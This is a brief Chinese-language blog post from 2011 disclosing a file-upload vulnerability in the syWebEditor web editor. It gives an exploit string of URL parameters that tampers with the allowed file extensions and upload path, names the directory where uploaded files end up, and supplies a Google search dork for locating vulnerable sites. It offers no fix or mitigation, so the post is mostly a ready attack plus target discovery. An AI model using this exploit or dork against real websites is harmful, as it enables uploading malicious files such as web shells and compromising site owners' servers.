Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2869341
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2011-04-06 21:46:21

syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的

编辑器一样。

exp:

%7Cjpg%7Cpng%7C&filePathType=1&filePath=/PhotoFile/ProFile/

上传后的目录/PhotoFile/ProFile/。有个自动改名的选项。

谷歌一下:inurl:syWebEditor

阅读(993) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~